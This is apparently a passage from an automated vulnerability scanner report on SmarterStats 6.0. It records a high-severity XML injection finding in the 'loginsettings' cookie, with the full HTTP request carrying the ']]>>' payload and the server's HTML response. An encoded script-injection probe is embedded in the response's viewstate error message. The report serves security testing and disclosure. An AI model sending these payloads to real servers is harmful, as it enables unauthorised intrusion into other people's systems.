   Logs imported from 1/1/0001 to 12/31/9999

           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmviewreports', 'Standard\x5fSiteUsage');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=Specific/ProgressBar"></script>

   <script type="text/javascript">
       var loaded = false;
       function DoDataMine(file, report) {
           //location.href = '/Client/frmViewReports.aspx?reporttype=interactive&file=' + file + '&mine=' + report;
           parent.dmFilename = file;
           parent.dmQuery = report;
           parent.UpdateSection('UserDataMining', null, false, false); //filename
       }
       function AddFavoritePopup() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 375, 320, null);
       }
       function AddFavoritePopup_Interactive() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 500, 270, null);
       }
       function AddFavoritePopup_SEO() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 375, 230, null);
       }
       function ExportReportPopup() {
           var url = "/Client/Popups/frmExportReport.aspx";
           window.name = "GenericWindow";
           SpawnHyperWindow(url, 400, 100, null);
       }
       function EmailReportPopup() {
           if (false)
           {
            var url = "/Client/Popups/frmEmailReport.aspx";
            window.name = "GenericWindow";
            SpawnHyperWindow(url, 450, 340, null);
           }
           else
           {
            ShowAlertWindow("In order to send reports through email, SMTP information must be entered into the Email Settings page by a site administrator.");
           }
       }
       function PrintReportPopup() {
           var url = "/Client/Popups/frmPrintPreview.aspx";
           parent.GenericPopup(url, "PrintPreview", "width=700,height=500,resizable=yes,scrollbars=yes,status=no");
       }
       function RadDataMine(filename, miningset, report) {
        SpawnHyperWindowWithElement(
        "/Client/Popups/frmDataMine.aspx?file=" + filename + "&miningset=" + miningset + "&report=" + report,
        400, 130, null, DoDataMine);
       }

       function GetProgressUpdate() {
           PageMethods.GetReportProgress(progressGuid, ProgressBarCallbackComplete, ProgressBarCallbackFailed);
       }
       function DoReportPostBack() {
           //
__doPostBack('ctl00$MPH$btnShowReport','');
       }
       function DoReportCancel() {
           //
__doPostBack('ctl00$MPH$lnkCancel','');;
       }
       function SiteUrlUndefined()
       {
           parent.ShowAlertWindow('The Site URL for this site has not been set. In order to view pages, define this value in the site general settings.');
       }
       var ProgressBarText = 'Processing';

   </script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fClient\x2ffrmViewReports\x2easpx?Custom\x3dFalse\x26ReportType\x3dStandard\x26subReportName\x3dSiteUsage'); });
$(function() { SetTopTitle('View\x20Report'); });
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"10/5/2010 12:00:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$RadStartDate\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_RadStartDate_dateInput_ClientState","dateFormat":"M/d/yyyy","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":false},"displayDateFormat":"M/d/yyyy","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_RadStartDate_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_RadStartDate_calendar_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":false,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$RadStartDate$calendar\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_RadStartDate_calendar_ClientState","enableMultiSelect":false,"enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false,"useRowHeadersAsSelectors":false}, null, null, $get("ctl00_MPH_RadStartDate_calendar"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDatePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_RadStartDate_popupButton","clientStateFieldID":"ctl00_MPH_RadStartDate_ClientState","focusedDate":"2010-10-11-00-00-00","maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00"}, null, {"calendar":"ctl00_MPH_RadStartDate_calendar","dateInput":"ctl00_MPH_RadStartDate_dateInput"}, $get("ctl00_MPH_RadStartDate"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"10/11/2010 12:00:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$RadEndDate\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_RadEndDate_dateInput_ClientState","dateFormat":"M/d/yyyy","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":false},"displayDateFormat":"M/d/yyyy","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_RadEndDate_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_RadEndDate_calendar_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":false,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$RadEndDate$calendar\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_RadEndDate_calendar_ClientState","enableMultiSelect":false,"enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false,"useRowHeadersAsSelectors":false}, null, null, $get("ctl00_MPH_RadEndDate_calendar"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDatePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_RadEndDate_popupButton","clientStateFieldID":"ctl00_MPH_RadEndDate_ClientState","focusedDate":"2010-10-11-00-00-00","maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00"}, null, {"calendar":"ctl00_MPH_RadEndDate_calendar","dateInput":"ctl00_MPH_RadEndDate_dateInput"}, $get("ctl00_MPH_RadEndDate"));
});
//]]>
</script>
</form>
</body>
</html>


3.13. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [loginsettings cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewReports.aspx

Issue detail

The loginsettings cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the loginsettings cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=SiteUsage HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott]]>>; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserSpiders"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:04:07 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 44346



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Reporting/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmViewReports.aspx?Custom=False&amp;ReportType=Standard&amp;subReportName=SiteUsage" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTIyNzU0MjE4NQ8WBB4QX19fUmVzdWx0RmFpbHVyZQWZBEltcG9ydCBFcnJvcjogMTAvMTEvMjAxMCA4OjAyIFBNIC0gRVJST1I6IENvdWxkIG5vdCBzYXZlIFNpdGVIaXN0b3J5IGZpbGUgQzpcJiN4MDAyMjsmI3gwMDJEOyYjeDAwMkQ7JiN4MDAzRTsmI3gwMDNDOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0OyYjeDAwM0U7JiN4MDA2MTsmI3gwMDZDOyYjeDAwNjU7JiN4MDA3MjsmI3gwMDc0OyYjeDAwMjg7JiN4MDAzMDsmI3gwMDc4OyYjeDAwMzA7JiN4MDAzMDsmI3gwMDMwOyYjeDAwMzc7JiN4MDA0NjsmI3gwMDM3OyYjeDAwMjk7JiN4MDAzQzsmI3gwMDJGOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0O1xXZWJMb2dzXDFcU2l0ZUNvbmZpZy54bWwubmV3My4gIEFzIGEgcHJlY2F1dGlvbiwgdGhpcyBzZXJ2ZXIgaGFzIGJlZW4gcGF1c2VkLiAgQSByZWJvb3QgbWF5IGJlIHRoZSBiZXN0IHdheSB0byBzb2x2ZSBhbnkgZmlsZSBsb2NraW5nIHByb2JsZW1zIHRoYXQgbWF5IGJlIHByZXNlbnQuPGJyPjxicj48YnI+PGJyPh4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYMAgMPZBYCAgEPZBYCAgEPZBYCZg9kFggCAQ8PFgIeB1Zpc2libGVoZGQCAw8PFgIeF0NsaWVudFNpZGVTY3JpcHRPbkNsaWNrBRJFbWFpbFJlcG9ydFBvcHVwKClkZAIFDw8WAh8DBRNFeHBvcnRSZXBvcnRQb3B1cCgpZGQCBw8PFgIfAwUSUHJpbnRSZXBvcnRQb3B1cCgpZGQCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsfAmhkAgYPFgIfAmhkAgcPZBYCZg9kFgICAQ9kFgICAQ8WAh4EVGV4dAW7BDxkaXYgY2xhc3M9IlRpcFRleHRGYWlsdXJlIj5JbXBvcnQgRXJyb3I6IDEwLzExLzIwMTAgODowMiBQTSAtIEVSUk9SOiBDb3VsZCBub3Qgc2F2ZSBTaXRlSGlzdG9yeSBmaWxlIEM6XCYjeDAwMjI7JiN4MDAyRDsmI3gwMDJEOyYjeDAwM0U7JiN4MDAzQzsmI3gwMDczOyYjeDAwNjM7JiN4MDA3MjsmI3gwMDY5OyYjeDAwNzA7JiN4MDA3NDsmI3gwMDNFOyYjeDAwNjE7JiN4MDA2QzsmI3gwMDY1OyYjeDAwNzI7JiN4MDA3NDsmI3gwMDI4OyYjeDAwMzA7JiN4MDA3ODsmI3gwMDMwOyYjeDAwMzA7JiN4MDAzMDsmI3gwMDM3OyYjeDAwNDY7JiN4MDAzNzsmI3gwMDI5OyYjeDAwM0M7JiN4MDAyRjsmI3gwMDczOyYjeDAwNjM7JiN4MDA3MjsmI3gwMDY5OyYjeDAwNzA7JiN4MDA3NDtcV2ViTG9nc1wxXFNpdGVDb25maWcueG1sLm5ldzMuICBBcyBhIHByZWNhdXRpb24sIHRoaXMgc2VydmVyIGhhcyBiZWVuIHBhdXNlZC4gIEEgcmVib290IG1heSBiZSB0aGUgYmVzdCB3YXkgdG8gc29sdmUgYW55IGZpbGUgbG9ja2luZyBwcm9ibGVtcyB0aGF0IG1heSBiZSBwcmVzZW50Ljxicj48YnI+PGJyPjxicj48L2Rpdj5kAggPFgIfAmhkAgkPZBYCAgEPZBYeAgMPDxYQHgxTZWxlY3RlZERhdGUGAMBRYzcyzQgeB01pbkRhdGUGAEDK+KPo4AceB01heERhdGUGAABowSlcoQkeHEVuYWJsZUVtYmVkZGVkQmFzZVN0eWxlc2hlZXRoHhNFbmFibGVFbWJlZGRlZFNraW5zaB4EU2tpbgUMU21hcnRlclRvb2xzHghDc3NDbGFzcwUSRGF0ZVBpY2tlck92ZXJyaWRlHgRfIVNCAgJkFgZmDxQrAAgPFhIfCmgfCwUMU21hcnRlclRvb2xzHwgGAABowSlcoQkeDU9yaWdpbmFsVmFsdWUFFTEwLzUvMjAxMCAxMjowMDowMCBBTR8FBRMyMDEwLTEwLTA1LTAwLTAwLTAwHg1MYWJlbENzc0NsYXNzBQdyaUxhYmVsHhdFbmFibGVBamF4U2tpblJlbmRlcmluZ2gfCWgfBwYAQMr4o+jgB2QWBh4FV2lkdGgbAAAAAAAAWUAHAAAAHwwFEXJpVGV4dEJveCByaUhvdmVyHw0CggIWBh8RGwAAAAAAAFlABwAAAB8MBRFyaVRleHRCb3ggcmlFcnJvch8NAoICFgYfERsAAAAAAABZQAcAAAAfDAUTcmlUZXh0Qm94IHJpRm9jdXNlZB8NAoICFgYfERsAAAAAAABZQAcAAAAfDAUTcmlUZXh0Qm94IHJpRW5hYmxlZB8NAoICFgYfERsAAAAAAABZQAcAAAAfDAUUcmlUZXh0Qm94IHJpRGlzYWJsZWQfDQKCAhYGHxEbAAAAAAAAWUAHAAAAHwwFEXJpVGV4dEJveCByaUVtcHR5Hw0CggIWBh8RGwAAAAAAAFlABwAAAB8MBRByaVRleHRCb3ggcmlSZWFkHw0CggJkAgEPDxYEHghJbWFnZVVybAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYeDUhvdmVySW1hZ2VVcmwFMi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L0NhbGVuZGFyTW9udGguZ2lmFgIeB29uY2xpY2sFPHJldHVybiBDYWxlbmRhclBvcHVwKCRmaW5kKCdjdGwwMF9NUEhfUmFkU3RhcnREYXRlJyksJ2NhbCcpO2QCAg8UKwANDxYaBQ9SZW5kZXJJbnZpc2libGVnBRFFbmFibGVNdWx0aVNlbGVjdGgFFkZhc3ROYXZpZ2F0aW9uUHJldlRleHRlBRFWaWV3U2VsZWN0b3JJbWFnZQUqL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodDIuZ2lmBQRNaW5EBgBAyvij6OAHBQ1TZWxlY3RlZERhdGVzDwWPAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkRhdGVUaW1lQ29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUOUm93SGVhZGVySW1hZ2UFKS9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQuZ2lmBRJOYXZpZ2F0aW9uTmV4dFRleHRlBQNFUlNoBRJOYXZpZ2F0aW9uUHJldlRleHRlBQtTcGVjaWFsRGF5cw8FkgFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5DYWxlbmRhckRheUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuNDAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAAFFkZhc3ROYXZpZ2F0aW9uTmV4dFRleHRlBQRNYXhEBgAAaMEpXKEJDxYIHwsFDFNtYXJ0ZXJUb29scx8KaB8JaB8QaGRkFgQfDAULcmNNYWluVGFibGUfDQICFgQfDAUMcmNPdGhlck1vbnRoHw0CAmQWBB8MBQpyY1NlbGVjdGVkHw0CAmQWBB8MBQpyY0Rpc2FibGVkHw0CAhYEHwwFDHJjT3V0T2ZSYW5nZR8NAgIWBB8MBQlyY1dlZWtlbmQfDQICFgQfDAUHcmNIb3Zlch8NAgIWBB8MBTZSYWRDYWxlbmRhck1vbnRoVmlldyBSYWRDYWxlbmRhck1vbnRoVmlld19TbWFydGVyVG9vbHMfDQICFgQfDAUJcmNWaWV3U2VsHw0CAmQCBw8PFhAfBgYAQMxh7jbNCB8HBgBAyvij6OAHHwgGAABowSlcoQkfCWgfCmgfCwUMU21hcnRlclRvb2xzHwwFEkRhdGVQaWNrZXJPdmVycmlkZR8NAgJkFgZmDxQrAAgPFhIfCmgfCwUMU21hcnRlclRvb2xzHwgGAABowSlcoQkfDgUWMTAvMTEvMjAxMCAxMjowMDowMCBBTR8FBRMyMDEwLTEwLTExLTAwLTAwLTAwHw8FB3JpTGFiZWwfEGgfCWgfBwYAQMr4o+jgB2QWBh8RGwAAAAAAAFlABwAAAB8MBRFyaVRleHRCb3ggcmlIb3Zlch8NAoICFgYfERsAAAAAAABZQAcAAAAfDAURcmlUZXh0Qm94IHJpRXJyb3IfDQKCAhYGHxEbAAAAAAAAWUAHAAAAHwwFE3JpVGV4dEJveCByaUZvY3VzZWQfDQKCAhYGHxEbAAAAAAAAWUAHAAAAHwwFE3JpVGV4dEJveCByaUVuYWJsZWQfDQKCAhYGHxEbAAAAAAAAWUAHAAAAHwwFFHJpVGV4dEJveCByaURpc2FibGVkHw0CggIWBh8RGwAAAAAAAFlABwAAAB8MBRFyaVRleHRCb3ggcmlFbXB0eR8NAoICFgYfERsAAAAAAABZQAcAAAAfDAUQcmlUZXh0Qm94IHJpUmVhZB8NAoICZAIBDw8WBB8SBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh8TBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZhYCHxQFOnJldHVybiBDYWxlbmRhclBvcHVwKCRmaW5kKCdjdGwwMF9NUEhfUmFkRW5kRGF0ZScpLCdjYWwnKTtkAgIPFCsADQ8WGgUPUmVuZGVySW52aXNpYmxlZwURRW5hYmxlTXVsdGlTZWxlY3RoBRZGYXN0TmF2aWdhdGlvblByZXZUZXh0ZQURVmlld1NlbGVjdG9ySW1hZ2UFKi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQyLmdpZgUETWluRAYAQMr4o+jgBwUNU2VsZWN0ZWREYXRlcw8FjwFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5Db2xsZWN0aW9ucy5EYXRlVGltZUNvbGxlY3Rpb24sIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuNDAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNBQrAAAFDlJvd0hlYWRlckltYWdlBSkvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0LmdpZgUSTmF2aWdhdGlvbk5leHRUZXh0ZQUDRVJTaAUSTmF2aWdhdGlvblByZXZUZXh0ZQULU3BlY2lhbERheXMPBZIBVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuQ2FsZW5kYXJEYXlDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjQwLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABRZGYXN0TmF2aWdhdGlvbk5leHRUZXh0ZQUETWF4RAYAAGjBKVyhCQ8WCB8LBQxTbWFydGVyVG9vbHMfCmgfCWgfEGhkZBYEHwwFC3JjTWFpblRhYmxlHw0CAhYEHwwFDHJjT3RoZXJNb250aB8NAgJkFgQfDAUKcmNTZWxlY3RlZB8NAgJkFgQfDAUKcmNEaXNhYmxlZB8NAgIWBB8MBQxyY091dE9mUmFuZ2UfDQICFgQfDAUJcmNXZWVrZW5kHw0CAhYEHwwFB3JjSG92ZXIfDQICFgQfDAU2UmFkQ2FsZW5kYXJNb250aFZpZXcgUmFkQ2FsZW5kYXJNb250aFZpZXdfU21hcnRlclRvb2xzHw0CAhYEHwwFCXJjVmlld1NlbB8NAgJkAgkPFgIfAmhkAgsPFgIfAmhkAg0PFgIfAmhkAg8PFgIfAmhkAhEPFgIfAmhkAhMPFgIfAmhkAhUPFgIfAmhkAhcPFgIfAmhkAhkPFgIfAmgWAgIBDxBkZBYAZAIbDxYCHwJoZAIdDxYCHwJoZAIfDxYCHwJoZAIhDw8WAh8FBQpHZXQgUmVwb3J0ZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgYFFmN0bDAwJE1QSCRSYWRTdGFydERhdGUFH2N0bDAwJE1QSCRSYWRTdGFydERhdGUkY2FsZW5kYXIFH2N0bDAwJE1QSCRSYWRTdGFydERhdGUkY2FsZW5kYXIFFGN0bDAwJE1QSCRSYWRFbmREYXRlBR1jdGwwMCRNUEgkUmFkRW5kRGF0ZSRjYWxlbmRhcgUdY3RsMDAkTVBIJFJhZEVuZERhdGUkY2FsZW5kYXKTgIeSE/kwhinT4a3Qhsjk7T/NRv2iB6x/fy0Bw6CLSQ==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


